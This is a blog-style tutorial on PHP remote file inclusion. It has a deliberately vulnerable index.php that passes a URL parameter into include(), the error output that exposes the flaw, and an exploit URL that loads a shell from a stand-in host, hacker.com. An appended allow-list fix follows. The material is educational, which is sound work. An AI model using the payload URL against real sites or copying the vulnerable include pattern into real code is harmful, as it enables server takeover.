Assalam-o-Alaikum,
Completing my RFI Series:
- Beginning of RFI
- Finding And Exploiting RFI vulnerabilities
- Securing RFI vulnerabilities
Let's begin,
786
So, in the last overview of RFI I said that file inclusion is including files in another file. Well, that is all right, but what does that actually mean?
Let's say we have two files:
index.php
content.php
index.php is the file people are going to view when they visit my page, www.site.com as usual. But we want index.php to display the contents of content.php without the user actually visiting content.php.
All you would need to do is put this PHP script in index.php:
Code: (php)
Now we are showing the contents of content.php when the user visits index.php. If content.php were to contain more PHP code, it would also get executed.
That is it. We just did file inclusion! However, this example is just a dummy page and would most likely not be found in real life.
Let's create a new scenario. A more realistic scenario. We have the following files/pages:
index.php
1.php
2.php
3.php
Now, index.php is again the file the users are going to visit. On the default index we are going to display 3 links:
www.site.com/index.php?page=1
www.site.com/index.php?page=2
www.site.com/index.php?page=3
When the user clicks the first link it's going to show the contents of 1.php, when the user clicks the second link it's going to show the contents of 2.php, and when the user clicks the last link it's going to show the contents of 3.php.
The index.php script would in this case look something like this (note that I am now coding like an idiot to create security holes):
Code: (php)
<?php
if (isset($_GET['page']))
{
    // Whatever the user put in ?page= is glued straight into include()
    include($_GET['page'] . ".php");
}
else
{
    // Default view: the three links from above
    echo('<a href="index.php?page=1">page1</a>');
    echo('<a href="index.php?page=2">page2</a>');
    echo('<a href="index.php?page=3">page3</a>');
}
?>
The contents of 1, 2 and 3 are not important in this example so I won't say anything about that. Now, when a user clicks the page1 link he or she is taken to www.site.com/index.php?page=1
The PHP script in index.php will now see that the user is requesting the page called 1 and it will include the number in the URL + ".php". The same goes for 2 and 3.
Now, what is this "Remote" part in RFI all about? Well, this belongs more in the "exploiting RFI vulnerabilities" part of this tutorial, but I have to say something short about it now.
The above code is vulnerable to RFI. You can test this by visiting:
www.site.com/index.php?page=4
That would give us an error (assuming the server administrator has not turned off "show errors" in the PHP configuration). The error would look something like this:
Warning: include(page4.php) [function.include]: failed to open stream: No such file or directory in PATH on line 3
Warning: include() [function.include]: Failed opening 'page4.php' for inclusion (include_path='.;PATH') in PATH\index.php on line 3
This would tell us that the include() function used in this script is not secured and can be exploited. The way you exploit it is by getting it to include your code so that you can control the server. This is where the “remote” part of RFI comes in. You can create a PHP script and save it as .txt, upload it to a server and then visit something like this:
http://www.site.com/index.php?page=http://hacker.com/shell.txt?
Note that the ? is there to get rid of the ".php" at the end, as we did not name the file .txt.php. Also, if you were to try to include a .php file from a remote server, it would only give you the executed output of that PHP file.
Now we have successfully put our code into the PHP engine of the victim server and we are free to do whatever can be done with PHP, which is mostly anything.
I think that is enough for today. Next up, finding RFI vulnerabilities, coming soon.
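Everything above hinges on the value of ?page= reaching include() untouched. As an added example (my code, not from the original post), here is the same three-page dispatcher written so that user input is only ever a lookup key; it assumes 1.php, 2.php and 3.php sit in a "pages" directory beside index.php, which is an assumption for this example.

```php
<?php
// Added example, not code from the original post: the three-page
// dispatcher above rewritten so the value of ?page= never reaches
// include() directly. Assumes 1.php, 2.php and 3.php live in a "pages"
// directory beside index.php (that directory name is an assumption).
declare(strict_types=1);

// Allow-list: the only files this script will ever include. A remote URL,
// "../../etc/passwd" or "4" is simply not a key here and gets rejected.
const PAGES = [
    '1' => 'pages/1.php',
    '2' => 'pages/2.php',
    '3' => 'pages/3.php',
];

// Map the requested page to a local path, or null if it is unknown. The
// input is used only as a lookup key, never as part of the path.
function resolvePage(?string $requested): ?string
{
    if ($requested === null || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/' . PAGES[$requested];
}

// Reject arrays (?page[]=x) as well as missing values.
$page = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : null;

if ($page === null) {
    // Default view: the same three links as the original index.php.
    foreach (array_keys(PAGES) as $key) {
        $key = htmlspecialchars((string) $key, ENT_QUOTES, 'UTF-8');
        echo '<a href="index.php?page=' . $key . '">page' . $key . '</a>' . "\n";
    }
    exit;
}

$path = resolvePage($page);
if ($path === null) {
    // Unknown page: no PHP warning leaks to the client (the warning text
    // quoted in the post is exactly what a probe looks for); log it
    // server-side so ?page=http://... attempts show up in monitoring.
    http_response_code(404);
    error_log('index.php: rejected page=' . substr($page, 0, 100));
    echo 'Page not found';
    exit;
}

// allow_url_include=Off in php.ini backs this up: even if raw input is
// reintroduced by a later edit, include() cannot fetch remote URLs.
include $path;
```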
Having confusion? Oh dear, ask me in the comments!!